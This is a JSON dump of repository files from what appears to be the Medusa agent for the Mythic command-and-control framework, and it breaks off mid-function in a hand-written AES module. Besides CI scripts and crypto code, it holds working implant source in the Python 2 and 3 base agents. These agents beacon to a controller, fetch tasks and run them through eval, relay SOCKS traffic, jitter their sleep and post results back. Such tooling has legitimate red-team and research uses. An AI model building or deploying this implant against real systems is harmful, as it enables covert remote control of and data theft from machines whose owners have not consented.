[
  {
    "path": ".github/scripts/matrix-test-builder.py",
    "content": "#!/usr/bin/env python3\nimport json\nimport os\nimport pathlib\nimport re\nimport sys\n\n\ndef discover_profiles(base_agent_path: pathlib.Path):\n    py2_profiles = {\n        re.match(r\"transport_(.+)\\.py2$\", p.name).group(1)\n        for p in base_agent_path.glob(\"transport_*.py2\")\n        if re.match(r\"transport_(.+)\\.py2$\", p.name)\n    }\n    py3_profiles = {\n        re.match(r\"transport_(.+)\\.py3$\", p.name).group(1)\n        for p in base_agent_path.glob(\"transport_*.py3\")\n        if re.match(r\"transport_(.+)\\.py3$\", p.name)\n    }\n    return sorted(py2_profiles.intersection(py3_profiles))\n\n\ndef build_matrix(profiles):\n    python_versions = [\"Python 2.7\", \"Python 3.8\"]\n    crypto_impls = [\"manual_crypto\", \"cryptography_lib\"]\n    return {\n        \"include\": [\n            {\n                \"profile\": profile,\n                \"python_version\": python_version,\n                \"crypto_impl\": crypto_impl,\n            }\n            for profile in profiles\n            for python_version in python_versions\n            for crypto_impl in crypto_impls\n        ]\n    }\n\n\ndef main():\n    repo_root = pathlib.Path(__file__).resolve().parents[2]\n    base_agent = repo_root / \"Payload_Type\" / \"medusa\" / \"medusa\" / \"agent_code\" / \"base_agent\"\n    profiles = discover_profiles(base_agent)\n    matrix = build_matrix(profiles)\n    matrix_json = json.dumps(matrix)\n\n    github_output = os.environ.get(\"GITHUB_OUTPUT\", \"\").strip()\n    if github_output:\n        with open(github_output, \"a\", encoding=\"utf-8\") as f:\n            f.write(f\"matrix={matrix_json}\\n\")\n    else:\n        sys.stdout.write(matrix_json + \"\\n\")\n\n\nif __name__ == \"__main__\":\n    main()\n"
  },
  {
    "path": ".github/workflows/payload-build-matrix.yml",
    "content": "name: Payload Build Matrix\n\non:\n  pull_request:\n    branches:\n      - main\n  push:\n    branches:\n      - dev\n\npermissions:\n  contents: read\n\nconcurrency:\n  group: payload-build-matrix-${{ github.ref }}\n  cancel-in-progress: true\n\njobs:\n  discover-combos:\n    runs-on: ubuntu-latest\n    outputs:\n      matrix: ${{ steps.discover.outputs.matrix }}\n    steps:\n      - name: Checkout\n        uses: actions/checkout@v4\n\n      - name: Setup Python\n        uses: actions/setup-python@v5\n        with:\n          python-version: \"3.11\"\n\n      - name: Discover supported build combinations\n        id: discover\n        run: |\n          python .github/scripts/matrix-test-builder.py\n\n  build-matrix:\n    needs: discover-combos\n    runs-on: ubuntu-latest\n    timeout-minutes: 15\n    strategy:\n      fail-fast: false\n      matrix: ${{ fromJSON(needs.discover-combos.outputs.matrix) }}\n\n    steps:\n      - name: Checkout\n        uses: actions/checkout@v4\n\n      - name: Setup Python\n        uses: actions/setup-python@v5\n        with:\n          python-version: \"3.11\"\n\n      - name: Run payload build tests for combo\n        env:\n          TEST_PROFILE: ${{ matrix.profile }}\n          TEST_PYTHON_VERSION: ${{ matrix.python_version }}\n          TEST_CRYPTO_IMPL: ${{ matrix.crypto_impl }}\n        run: |\n          python -m unittest tests/test_payload_build_matrix.py -v\n"
  },
  {
    "path": ".gitignore",
    "content": "*.DS_Store\n__pycache__/\n"
  },
  {
    "path": "C2_Profiles/.keep",
    "content": ""
  },
  {
    "path": "Payload_Type/medusa/Dockerfile",
    "content": "FROM itsafeaturemythic/mythic_python_base:latest\n\nWORKDIR /Mythic/\n\nCMD [\"python3\", \"main.py\"]"
  },
  {
    "path": "Payload_Type/medusa/main.py",
    "content": "import mythic_container\r\nimport asyncio\r\nfrom medusa.mythic import *\r\n\r\nmythic_container.mythic_service.start_and_run_forever()"
  },
  {
    "path": "Payload_Type/medusa/medusa/__init__.py",
    "content": ""
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/base_agent/base_agent_core.py2",
    "content": "import os, random, sys, json, socket, base64, time, platform, ssl, getpass\nfrom datetime import datetime\nimport threading\nfrom Queue import Queue\nTRANSPORT_IMPORTS\n\nCHUNK_SIZE = 51200\n\nCRYPTO_HERE\n\n    def getOSVersion(self):\n        if platform.mac_ver()[0]: return \"macOS \"+platform.mac_ver()[0]\n        else: return platform.system() + \" \" + platform.release()\n\n    def getUsername(self):\n        try: return getpass.getuser()\n        except: pass\n        for k in [ \"USER\", \"LOGNAME\", \"USERNAME\" ]:\n            if k in os.environ.keys(): return os.environ[k]\n\nTRANSPORT_CLASS_FIELDS\n\n    def formatMessage(self, data, urlsafe=False):\n        uuid_to_use = self.agent_config[\"UUID\"]\n        if uuid_to_use == \"\":\n            uuid_to_use = self.agent_config[\"PayloadUUID\"]\n        output = base64.b64encode(uuid_to_use.encode() + self.encrypt(json.dumps(data).encode()))\n        if urlsafe:\n            output = base64.urlsafe_b64encode(uuid_to_use.encode() + self.encrypt(json.dumps(data).encode()))\n        return output\n\n    def formatResponse(self, data):\n        uuid_to_use = self.agent_config[\"UUID\"]\n        if uuid_to_use == \"\":\n            uuid_to_use = self.agent_config[\"PayloadUUID\"]\n        if isinstance(data, bytes):\n            decoded = data.decode()\n        else:\n            decoded = data\n        cleaned = decoded.replace(uuid_to_use, \"\")\n        if not cleaned or cleaned.strip() == \"\":\n            return {}\n        return json.loads(cleaned)\n\nTRANSPORT_FUNCTIONS\n\n    def sendTaskOutputUpdate(self, task_id, output):\n        responses = [{ \"task_id\": task_id, \"user_output\": output, \"completed\": False }]\n        message = { \"action\": \"post_response\", \"responses\": responses }\n        response_data = self.postMessageAndRetrieveResponse(message)\n        if \"socks\" in response_data:\n            for packet in response_data[\"socks\"]: self.socks_in.put(packet)\n\n    def postResponses(self):\n        try:\n            responses = []\n            socks = []\n            taskings = self.taskings\n            for task in taskings:\n                if task[\"completed\"] == True:\n                    out = { \"task_id\": task[\"task_id\"], \"user_output\": task[\"result\"], \"completed\": True }\n                    if task[\"error\"]: out[\"status\"] = \"error\"\n                    for func in [\"processes\", \"file_browser\"]:\n                        if func in task: out[func] = task[func]\n                    responses.append(out)\n            while not self.socks_out.empty(): socks.append(self.socks_out.get())\n            if ((len(responses) > 0) or (len(socks) > 0)):\n                message = { \"action\": \"post_response\", \"responses\": responses }\n                if socks: message[\"socks\"] = socks\n                response_data = self.postMessageAndRetrieveResponse(message)\n                for resp in response_data[\"responses\"]:\n                    task_index = [t for t in self.taskings \\\n                                  if resp[\"task_id\"] == t[\"task_id\"] \\\n                                  and resp[\"status\"] == \"success\"][0]\n                    self.taskings.pop(self.taskings.index(task_index))\n                if \"socks\" in response_data:\n                    for packet in response_data[\"socks\"]: self.socks_in.put(packet)\n        except: pass\n\n    def processTask(self, task):\n        try:\n            task[\"started\"] = True\n            function = getattr(self, task[\"command\"], None)\n            if(callable(function)):\n                try:\n                    params = json.loads(task[\"parameters\"]) if task[\"parameters\"] else {}\n                    params['task_id'] = task[\"task_id\"]\n                    command =  \"self.\" + task[\"command\"] + \"(**params)\"\n                    output = eval(command)\n                except Exception as error:\n                    output = str(error)\n                    task[\"error\"] = True\n                task[\"result\"] = output\n                task[\"completed\"] = True\n            else:\n                task[\"error\"] = True\n                task[\"completed\"] = True\n                task[\"result\"] = \"Function unavailable.\"\n        except Exception as error:\n            task[\"error\"] = True\n            task[\"completed\"] = True\n            task[\"result\"] = error\n\n    def processTaskings(self):\n        threads = list()\n        taskings = self.taskings\n        for task in taskings:\n            if task[\"started\"] == False:\n                x = threading.Thread(target=self.processTask, name=\"{}:{}\".format(task[\"command\"], task[\"task_id\"]), args=(task,))\n                threads.append(x)\n                x.start()\n\n    def getTaskings(self):\n        data = { \"action\": \"get_tasking\", \"tasking_size\": -1 }\n        tasking_data = self.getMessageAndRetrieveResponse(data)\n        for task in tasking_data[\"tasks\"]:\n            t = {\n                \"task_id\":task[\"id\"],\n                \"command\":task[\"command\"],\n                \"parameters\":task[\"parameters\"],\n                \"result\":\"\",\n                \"completed\": False,\n                \"started\":False,\n                \"error\":False,\n                \"stopped\":False\n            }\n            self.taskings.append(t)\n        if \"socks\" in tasking_data:\n            for packet in tasking_data[\"socks\"]: self.socks_in.put(packet)\n\n    def passedKilldate(self):\n        kd_list = [ int(x) for x in self.agent_config[\"KillDate\"].split(\"-\")]\n        kd = datetime(kd_list[0], kd_list[1], kd_list[2])\n        if datetime.now() >= kd: return True\n        else: return False\n\n    def agentSleep(self):\n        j = 0\n        if int(self.agent_config[\"Jitter\"]) > 0:\n            v = float(self.agent_config[\"Sleep\"]) * (float(self.agent_config[\"Jitter\"])/100)\n            if int(v) > 0:\n                j = random.randrange(0, int(v))\n        time.sleep(self.agent_config[\"Sleep\"]+j)\n\n#COMMANDS_HERE\n\n    def __init__(self):\n        self.socks_open = {}\n        self.socks_in = Queue()\n        self.socks_out = Queue()\n        self.taskings = []\n        self._meta_cache = {}\n        self.moduleRepo = {}\n        self.current_directory = os.getcwd()\n        self.agent_config = {\n            \"PayloadUUID\": \"UUID_HERE\",\n            \"UUID\": \"\",\n            \"KillDate\": \"killdate\",\n            \"enc_key\": AESPSK,\n            \"ExchChk\": \"encrypted_exchange_check\",\n            \"ProxyHost\": \"proxy_host\",\n            \"ProxyUser\": \"proxy_user\",\n            \"ProxyPass\": \"proxy_pass\",\n            \"ProxyPort\": \"proxy_port\",\nTRANSPORT_CONFIG\n        }\n\n        while True:\n            if(self.agent_config[\"UUID\"] == \"\"):\n                self.checkIn()\n                self.agentSleep()\n            else:\n                while True:\n                    if self.passedKilldate():\n                        self.exit(None)\n                    try:\n                        self.getTaskings()\n                        self.processTaskings()\n                        self.postResponses()\n                    except: pass\n                    self.agentSleep()\n\nif __name__ == \"__main__\":\n    medusa = medusa()\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/base_agent/base_agent_core.py3",
    "content": "import os, random, sys, json, socket, base64, time, platform, ssl, getpass\nfrom datetime import datetime\nimport threading, queue\nTRANSPORT_IMPORTS\n\nCHUNK_SIZE = 51200\n\nCRYPTO_HERE\n\n    def getOSVersion(self):\n        if platform.mac_ver()[0]: return \"macOS \"+platform.mac_ver()[0]\n        else: return platform.system() + \" \" + platform.release()\n\n    def getUsername(self):\n        try: return getpass.getuser()\n        except: pass\n        for k in [ \"USER\", \"LOGNAME\", \"USERNAME\" ]:\n            if k in os.environ.keys(): return os.environ[k]\n\nTRANSPORT_CLASS_FIELDS\n\n    def formatMessage(self, data, urlsafe=False):\n        uuid_to_use = self.agent_config[\"UUID\"]\n        if uuid_to_use == \"\":\n            uuid_to_use = self.agent_config[\"PayloadUUID\"]\n        output = base64.b64encode(uuid_to_use.encode() + self.encrypt(json.dumps(data).encode()))\n        if urlsafe:\n            output = base64.urlsafe_b64encode(uuid_to_use.encode() + self.encrypt(json.dumps(data).encode()))\n        return output\n\n    def formatResponse(self, data):\n        uuid_to_use = self.agent_config[\"UUID\"]\n        if uuid_to_use == \"\":\n            uuid_to_use = self.agent_config[\"PayloadUUID\"]\n        if isinstance(data, bytes):\n            decoded = data.decode()\n        else:\n            decoded = data\n        cleaned = decoded.replace(uuid_to_use, \"\")\n        if not cleaned or cleaned.strip() == \"\":\n            return {}\n        return json.loads(cleaned)\n\nTRANSPORT_FUNCTIONS\n\n    def sendTaskOutputUpdate(self, task_id, output):\n        responses = [{ \"task_id\": task_id, \"user_output\": output, \"completed\": False }]\n        message = { \"action\": \"post_response\", \"responses\": responses }\n        response_data = self.postMessageAndRetrieveResponse(message)\n        if \"socks\" in response_data:\n            for packet in response_data[\"socks\"]: self.socks_in.put(packet)\n\n    def postResponses(self):\n        try:\n            responses = []\n            socks = []\n            taskings = self.taskings\n            for task in taskings:\n                if task[\"completed\"] == True:\n                    out = { \"task_id\": task[\"task_id\"], \"user_output\": task[\"result\"], \"completed\": True }\n                    if task[\"error\"]: out[\"status\"] = \"error\"\n                    for func in [\"processes\", \"file_browser\"]:\n                        if func in task: out[func] = task[func]\n                    responses.append(out)\n            while not self.socks_out.empty(): socks.append(self.socks_out.get())\n            if ((len(responses) > 0) or (len(socks) > 0)):\n                message = { \"action\": \"post_response\", \"responses\": responses }\n                if socks: message[\"socks\"] = socks\n                response_data = self.postMessageAndRetrieveResponse(message)\n                for resp in response_data[\"responses\"]:\n                    task_index = [t for t in self.taskings \\\n                                  if resp[\"task_id\"] == t[\"task_id\"] \\\n                                  and resp[\"status\"] == \"success\"][0]\n                    self.taskings.pop(self.taskings.index(task_index))\n                if \"socks\" in response_data:\n                    for packet in response_data[\"socks\"]: self.socks_in.put(packet)\n        except: pass\n\n    def processTask(self, task):\n        try:\n            task[\"started\"] = True\n            function = getattr(self, task[\"command\"], None)\n            if(callable(function)):\n                try:\n                    params = json.loads(task[\"parameters\"]) if task[\"parameters\"] else {}\n                    params['task_id'] = task[\"task_id\"]\n                    command =  \"self.\" + task[\"command\"] + \"(**params)\"\n                    output = eval(command)\n                except Exception as error:\n                    output = str(error)\n                    task[\"error\"] = True\n                task[\"result\"] = output\n                task[\"completed\"] = True\n            else:\n                task[\"error\"] = True\n                task[\"completed\"] = True\n                task[\"result\"] = \"Function unavailable.\"\n        except Exception as error:\n            task[\"error\"] = True\n            task[\"completed\"] = True\n            task[\"result\"] = error\n\n    def processTaskings(self):\n        threads = list()\n        taskings = self.taskings\n        for task in taskings:\n            if task[\"started\"] == False:\n                x = threading.Thread(target=self.processTask, name=\"{}:{}\".format(task[\"command\"], task[\"task_id\"]), args=(task,))\n                threads.append(x)\n                x.start()\n\n    def getTaskings(self):\n        data = { \"action\": \"get_tasking\", \"tasking_size\": -1 }\n        tasking_data = self.getMessageAndRetrieveResponse(data)\n        for task in tasking_data[\"tasks\"]:\n            t = {\n                \"task_id\":task[\"id\"],\n                \"command\":task[\"command\"],\n                \"parameters\":task[\"parameters\"],\n                \"result\":\"\",\n                \"completed\": False,\n                \"started\":False,\n                \"error\":False,\n                \"stopped\":False\n            }\n            self.taskings.append(t)\n        if \"socks\" in tasking_data:\n            for packet in tasking_data[\"socks\"]: self.socks_in.put(packet)\n\n    def passedKilldate(self):\n        kd_list = [ int(x) for x in self.agent_config[\"KillDate\"].split(\"-\")]\n        kd = datetime(kd_list[0], kd_list[1], kd_list[2])\n        if datetime.now() >= kd: return True\n        else: return False\n\n    def agentSleep(self):\n        j = 0\n        if int(self.agent_config[\"Jitter\"]) > 0:\n            v = float(self.agent_config[\"Sleep\"]) * (float(self.agent_config[\"Jitter\"])/100)\n            if int(v) > 0:\n                j = random.randrange(0, int(v))\n        time.sleep(self.agent_config[\"Sleep\"]+j)\n\n#COMMANDS_HERE\n\n    def __init__(self):\n        self.socks_open = {}\n        self.socks_in = queue.Queue()\n        self.socks_out = queue.Queue()\n        self.taskings = []\n        self._meta_cache = {}\n        self.moduleRepo = {}\n        self.current_directory = os.getcwd()\n        self.agent_config = {\n            \"PayloadUUID\": \"UUID_HERE\",\n            \"UUID\": \"\",\n            \"KillDate\": \"killdate\",\n            \"enc_key\": AESPSK,\n            \"ExchChk\": \"encrypted_exchange_check\",\n            \"ProxyHost\": \"proxy_host\",\n            \"ProxyUser\": \"proxy_user\",\n            \"ProxyPass\": \"proxy_pass\",\n            \"ProxyPort\": \"proxy_port\",\nTRANSPORT_CONFIG\n        }\n\n        while True:\n            if(self.agent_config[\"UUID\"] == \"\"):\n                self.checkIn()\n                self.agentSleep()\n            else:\n                while True:\n                    if self.passedKilldate():\n                        self.exit(None)\n                    try:\n                        self.getTaskings()\n                        self.processTaskings()\n                        self.postResponses()\n                    except: pass\n                    self.agentSleep()\n\nif __name__ == \"__main__\":\n    medusa = medusa()\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/base_agent/crypto_lib.py2",
    "content": "class medusa:\n    def encrypt(self, data):\n        from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes\n        from cryptography.hazmat.primitives import hashes, hmac, padding\n        from cryptography.hazmat.backends import default_backend\n\n        if not self.agent_config[\"enc_key\"][\"value\"] == \"none\" and len(data)>0:\n            key = base64.b64decode(self.agent_config[\"enc_key\"][\"enc_key\"])\n            iv = os.urandom(16)\n\n            backend = default_backend()\n            cipher = Cipher(algorithms.AES(key), modes.CBC(iv), backend)\n            encryptor = cipher.encryptor()\n\n            padder = padding.PKCS7(128).padder()\n            padded_data = padder.update(data)\n            padded_data += padder.finalize()\n\n            ct = encryptor.update(padded_data) + encryptor.finalize()\n\n            h = hmac.HMAC(key, hashes.SHA256(), backend)\n            h.update(iv + ct)\n            hmac = h.finalize()\n\n            output = iv + ct + hmac\n            return output\n        else:\n            return data\n\n    def decrypt(self, data):\n        from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes\n        from cryptography.hazmat.primitives import hashes, hmac, padding\n        from cryptography.hazmat.backends import default_backend\n\n        if not self.agent_config[\"enc_key\"][\"value\"] == \"none\":\n            if len(data)>0:\n                backend = default_backend()\n\n                key = base64.b64decode(self.agent_config[\"enc_key\"][\"dec_key\"])\n                uuid = data[:36]\n                iv = data[36:52]\n                ct = data[52:-32]\n                received_hmac = data[-32:]\n\n                h = hmac.HMAC(key, hashes.SHA256(), backend)\n                h.update(iv + ct)\n                hmac = h.finalize()\n\n                if base64.b64encode(hmac) == base64.b64encode(received_hmac):\n                    cipher = Cipher(algorithms.AES(key), modes.CBC(iv), backend)\n                    decryptor = cipher.decryptor()\n                    pt = decryptor.update(ct) + decryptor.finalize()\n                    unpadder = padding.PKCS7(128).unpadder()\n                    decrypted_data = unpadder.update(pt)\n                    decrypted_data += unpadder.finalize()\n                    return (uuid+decrypted_data).decode()\n                else: return \"\"\n            else: return \"\"\n        else:\n            return data.decode()\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/base_agent/crypto_lib.py3",
    "content": "class medusa:\n    def encrypt(self, data):\n        from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes\n        from cryptography.hazmat.primitives import hashes, hmac, padding\n        from cryptography.hazmat.backends import default_backend\n\n        if not self.agent_config[\"enc_key\"][\"value\"] == \"none\" and len(data)>0:\n            key = base64.b64decode(self.agent_config[\"enc_key\"][\"enc_key\"])\n            iv = os.urandom(16)\n\n            backend = default_backend()\n            cipher = Cipher(algorithms.AES(key), modes.CBC(iv), backend)\n            encryptor = cipher.encryptor()\n\n            padder = padding.PKCS7(128).padder()\n            padded_data = padder.update(data)\n            padded_data += padder.finalize()\n\n            ct = encryptor.update(padded_data) + encryptor.finalize()\n\n            h = hmac.HMAC(key, hashes.SHA256(), backend)\n            h.update(iv + ct)\n            hmac = h.finalize()\n\n            output = iv + ct + hmac\n            return output\n        else:\n            return data\n\n    def decrypt(self, data):\n        from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes\n        from cryptography.hazmat.primitives import hashes, hmac, padding\n        from cryptography.hazmat.backends import default_backend\n\n        if not self.agent_config[\"enc_key\"][\"value\"] == \"none\":\n            if len(data)>0:\n                backend = default_backend()\n\n                key = base64.b64decode(self.agent_config[\"enc_key\"][\"dec_key\"])\n                uuid = data[:36]\n                iv = data[36:52]\n                ct = data[52:-32]\n                received_hmac = data[-32:]\n\n                h = hmac.HMAC(key, hashes.SHA256(), backend)\n                h.update(iv + ct)\n                hmac = h.finalize()\n\n                if base64.b64encode(hmac) == base64.b64encode(received_hmac):\n                    cipher = Cipher(algorithms.AES(key), modes.CBC(iv), backend)\n                    decryptor = cipher.decryptor()\n                    pt = decryptor.update(ct) + decryptor.finalize()\n                    unpadder = padding.PKCS7(128).unpadder()\n                    decrypted_data = unpadder.update(pt)\n                    decrypted_data += unpadder.finalize()\n                    return (uuid+decrypted_data).decode()\n                else: return \"\"\n            else: return \"\"\n        else:\n            return data.decode()\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/agent_code/base_agent/manual_crypto.py2",
    "content": "s_box = (\n    0x63, 0x7C, 0x77, 0x7B, 0xF2, 0x6B, 0x6F, 0xC5, 0x30, 0x01, 0x67, 0x2B, 0xFE, 0xD7, 0xAB, 0x76,\n    0xCA, 0x82, 0xC9, 0x7D, 0xFA, 0x59, 0x47, 0xF0, 0xAD, 0xD4, 0xA2, 0xAF, 0x9C, 0xA4, 0x72, 0xC0,\n    0xB7, 0xFD, 0x93, 0x26, 0x36, 0x3F, 0xF7, 0xCC, 0x34, 0xA5, 0xE5, 0xF1, 0x71, 0xD8, 0x31, 0x15,\n    0x04, 0xC7, 0x23, 0xC3, 0x18, 0x96, 0x05, 0x9A, 0x07, 0x12, 0x80, 0xE2, 0xEB, 0x27, 0xB2, 0x75,\n    0x09, 0x83, 0x2C, 0x1A, 0x1B, 0x6E, 0x5A, 0xA0, 0x52, 0x3B, 0xD6, 0xB3, 0x29, 0xE3, 0x2F, 0x84,\n    0x53, 0xD1, 0x00, 0xED, 0x20, 0xFC, 0xB1, 0x5B, 0x6A, 0xCB, 0xBE, 0x39, 0x4A, 0x4C, 0x58, 0xCF,\n    0xD0, 0xEF, 0xAA, 0xFB, 0x43, 0x4D, 0x33, 0x85, 0x45, 0xF9, 0x02, 0x7F, 0x50, 0x3C, 0x9F, 0xA8,\n    0x51, 0xA3, 0x40, 0x8F, 0x92, 0x9D, 0x38, 0xF5, 0xBC, 0xB6, 0xDA, 0x21, 0x10, 0xFF, 0xF3, 0xD2,\n    0xCD, 0x0C, 0x13, 0xEC, 0x5F, 0x97, 0x44, 0x17, 0xC4, 0xA7, 0x7E, 0x3D, 0x64, 0x5D, 0x19, 0x73,\n    0x60, 0x81, 0x4F, 0xDC, 0x22, 0x2A, 0x90, 0x88, 0x46, 0xEE, 0xB8, 0x14, 0xDE, 0x5E, 0x0B, 0xDB,\n    0xE0, 0x32, 0x3A, 0x0A, 0x49, 0x06, 0x24, 0x5C, 0xC2, 0xD3, 0xAC, 0x62, 0x91, 0x95, 0xE4, 0x79,\n    0xE7, 0xC8, 0x37, 0x6D, 0x8D, 0xD5, 0x4E, 0xA9, 0x6C, 0x56, 0xF4, 0xEA, 0x65, 0x7A, 0xAE, 0x08,\n    0xBA, 0x78, 0x25, 0x2E, 0x1C, 0xA6, 0xB4, 0xC6, 0xE8, 0xDD, 0x74, 0x1F, 0x4B, 0xBD, 0x8B, 0x8A,\n    0x70, 0x3E, 0xB5, 0x66, 0x48, 0x03, 0xF6, 0x0E, 0x61, 0x35, 0x57, 0xB9, 0x86, 0xC1, 0x1D, 0x9E,\n    0xE1, 0xF8, 0x98, 0x11, 0x69, 0xD9, 0x8E, 0x94, 0x9B, 0x1E, 0x87, 0xE9, 0xCE, 0x55, 0x28, 0xDF,\n    0x8C, 0xA1, 0x89, 0x0D, 0xBF, 0xE6, 0x42, 0x68, 0x41, 0x99, 0x2D, 0x0F, 0xB0, 0x54, 0xBB, 0x16,\n)\n\ninv_s_box = (\n    0x52, 0x09, 0x6A, 0xD5, 0x30, 0x36, 0xA5, 0x38, 0xBF, 0x40, 0xA3, 0x9E, 0x81, 0xF3, 0xD7, 0xFB,\n    0x7C, 0xE3, 0x39, 0x82, 0x9B, 0x2F, 0xFF, 0x87, 0x34, 0x8E, 0x43, 0x44, 0xC4, 0xDE, 0xE9, 0xCB,\n    0x54, 0x7B, 0x94, 0x32, 0xA6, 0xC2, 0x23, 0x3D, 0xEE, 0x4C, 0x95, 0x0B, 0x42, 0xFA, 0xC3, 0x4E,\n    0x08, 0x2E, 0xA1, 0x66, 0x28, 0xD9, 0x24, 0xB2, 0x76, 0x5B, 0xA2, 0x49, 0x6D, 0x8B, 0xD1, 0x25,\n    0x72, 0xF8, 0xF6, 0x64, 0x86, 0x68, 0x98, 0x16, 0xD4, 0xA4, 0x5C, 0xCC, 0x5D, 0x65, 0xB6, 0x92,\n    0x6C, 0x70, 0x48, 0x50, 0xFD, 0xED, 0xB9, 0xDA, 0x5E, 0x15, 0x46, 0x57, 0xA7, 0x8D, 0x9D, 0x84,\n    0x90, 0xD8, 0xAB, 0x00, 0x8C, 0xBC, 0xD3, 0x0A, 0xF7, 0xE4, 0x58, 0x05, 0xB8, 0xB3, 0x45, 0x06,\n    0xD0, 0x2C, 0x1E, 0x8F, 0xCA, 0x3F, 0x0F, 0x02, 0xC1, 0xAF, 0xBD, 0x03, 0x01, 0x13, 0x8A, 0x6B,\n    0x3A, 0x91, 0x11, 0x41, 0x4F, 0x67, 0xDC, 0xEA, 0x97, 0xF2, 0xCF, 0xCE, 0xF0, 0xB4, 0xE6, 0x73,\n    0x96, 0xAC, 0x74, 0x22, 0xE7, 0xAD, 0x35, 0x85, 0xE2, 0xF9, 0x37, 0xE8, 0x1C, 0x75, 0xDF, 0x6E,\n    0x47, 0xF1, 0x1A, 0x71, 0x1D, 0x29, 0xC5, 0x89, 0x6F, 0xB7, 0x62, 0x0E, 0xAA, 0x18, 0xBE, 0x1B,\n    0xFC, 0x56, 0x3E, 0x4B, 0xC6, 0xD2, 0x79, 0x20, 0x9A, 0xDB, 0xC0, 0xFE, 0x78, 0xCD, 0x5A, 0xF4,\n    0x1F, 0xDD, 0xA8, 0x33, 0x88, 0x07, 0xC7, 0x31, 0xB1, 0x12, 0x10, 0x59, 0x27, 0x80, 0xEC, 0x5F,\n    0x60, 0x51, 0x7F, 0xA9, 0x19, 0xB5, 0x4A, 0x0D, 0x2D, 0xE5, 0x7A, 0x9F, 0x93, 0xC9, 0x9C, 0xEF,\n    0xA0, 0xE0, 0x3B, 0x4D, 0xAE, 0x2A, 0xF5, 0xB0, 0xC8, 0xEB, 0xBB, 0x3C, 0x83, 0x53, 0x99, 0x61,\n    0x17, 0x2B, 0x04, 0x7E, 0xBA, 0x77, 0xD6, 0x26, 0xE1, 0x69, 0x14, 0x63, 0x55, 0x21, 0x0C, 0x7D,\n)\n\ndef sub_bytes(s):\n    for i in range(4): \n        for j in range(4):\n            s[i][j] = s_box[s[i][j]]\n\ndef inv_sub_bytes(s):\n    for i in range(4):\n        for j in range(4):\n            s[i][j] = inv_s_box[s[i][j]]\n\ndef shift_rows(s):\n    s[0][1], s[1][1], s[2][1], s[3][1] = s[1][1], s[2][1], s[3][1], s[0][1]\n    s[0][2], s[1][2], s[2][2], s[3][2] = s[2][2], s[3][2], s[0][2], s[1][2]\n    s[0][3], s[1][3], s[2][3], s[3][3] = s[3][3], s[0][3], s[1][3], s[2][3]\n\ndef inv_shift_rows(s):\n    s[0][1], s[1][1], s[2][1], s[3][1] = s[3][1], s[0][1], s[1][1], s[2][1]\n    s[0][2], s[1][2], s[2][2], s[3][2] = s[2][2], s[3][2], s[0][2], s[1][2]\n    s[0][3], s[1][3], s[2][3], s[3][3] = s[1][3], s[2][3], s[3][3], s[0][3]\n\ndef add_round_key(s, k):\n    for i in range(4):\n        for j in range(4):\n            s[i][j] ^= k[i][j]\n\nxtime = lambda a: (((a << 1) ^ 0x1B) & 0xFF) if (a & 0x80) else (a << 1)\n\ndef mix_single_column(a):\n    t = a[0] ^ a[1] ^ a[2] ^ a[3]\n    u = a[0]\n    a[0] ^= t ^ xtime(a[0] ^ a[1])\n    a[1] ^= t ^ xtime(a[1] ^ a[2])\n    a[2] ^= t ^ xtime(a[2] ^ a[3])\n    a[3] ^= t ^ xtime(a[3] ^ u)\n\ndef mix_columns(s):\n    for i in range(4): mix_single_column(s[i])\n\ndef inv_mix_columns(s):\n    for i in range(4):\n        u = xtime(xtime(s[i][0] ^ s[i][2]))\n        v = xtime(xtime(s[i][1] ^ s[i][3]))\n        s[i][0] ^= u\n        s[i][1] ^= v\n        s[i][2] ^= u\n        s[i][3] ^= v\n\n    mix_columns(s)\n\nr_con = (\n    0x00, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40,\n    0x80, 0x1B, 0x36, 0x6C, 0xD8, 0xAB, 0x4D, 0x9A,\n    0x2F, 0x5E, 0xBC, 0x63, 0xC6, 0x97, 0x35, 0x6A,\n    0xD4, 0xB3, 0x7D, 0xFA, 0xEF, 0xC5, 0x91, 0x39,\n)\n\ndef bytes2matrix(text):\n    return [list([ord(x) for x in text[i:i+4]]) for i in range(0, len(text), 4)]\n\ndef bytes2amatrix(text):\n    return [list([x for x in text[i:i+4]]) for i in range(0, len(text), 4)]\n\ndef matrix2bytes(matrix):\n    return [chr(x) for x in sum(matrix, [])]\n\ndef xor_bytes(a, b, as_chr=False):\n    out = []\n    for i, j in zip(a, b):\n        if isinstance(i, basestring): i = ord(i)\n        if isinstance(j, basestring): j = ord(j)\n        out.append(chr(i^j)) if as_chr else out.append(i^j)\n    return out\n\ndef inc_bytes(a):\n    out = list(a)\n    for i in reversed(range(len(out))):\n        if out[i] == 0xFF:\n            out[i] = 0\n        else:\n            out[i] += 1\n            break\n    return bytes(out)\n\ndef pad(plaintext):\n    padding_len = 16 - (len(plaintext) % 16)\n    padding = bytes(chr(padding_len) * padding_len)\n    return plaintext + padding\n\ndef unpad(plaintext):\n    padding_len = ord(plaintext[-1])\n    assert padding_len > 0\n    message, padding = plaintext[:-padding_len], plaintext[-padding_len:]\n    assert all(p == chr(padding_len) for p in padding)\n    return message\n\ndef split_blocks(message, block_size=16, require_padding=True):\n        assert len(message) % block_size == 0 or not require_padding\n        return [message[i:i+16] for i in range(0, len(message), block_size)]\n\nclass AES:\n    rounds_by_key_size = {16: 10, 24: 12, 32: 14}\n    def __init__(self, master_key):\n        assert len(master_key) in AES.rounds_by_key_size\n        self.n_rounds = AES.rounds_by_key_size[len(master_key)]\n        self._key_matrices = self._expand_key(master_key)\n\n    def _expand_key(self, master_key):\n        key_columns = bytes2matrix(master_key)\n        iteration_size = len(master_key) // 4\n        columns_per_iteration = len(key_columns)\n        i = 1\n        while len(key_columns) < (self.n_rounds + 1) * 4:\n            word = list(key_columns[-1])\n            if len(key_columns) % iteration_size == 0:\n                word.append(word.pop(0))\n                word = [s_box[b] for b in word]\n                word[0] ^= r_con[i]\n                i += 1\n            elif len(master_key) == 32 and len(key_columns) % iteration_size == 4:\n                word = [s_box[b] for b in word]\n            word = xor_bytes(word, key_columns[-iteration_size])\n            key_columns.append(word)\n        return 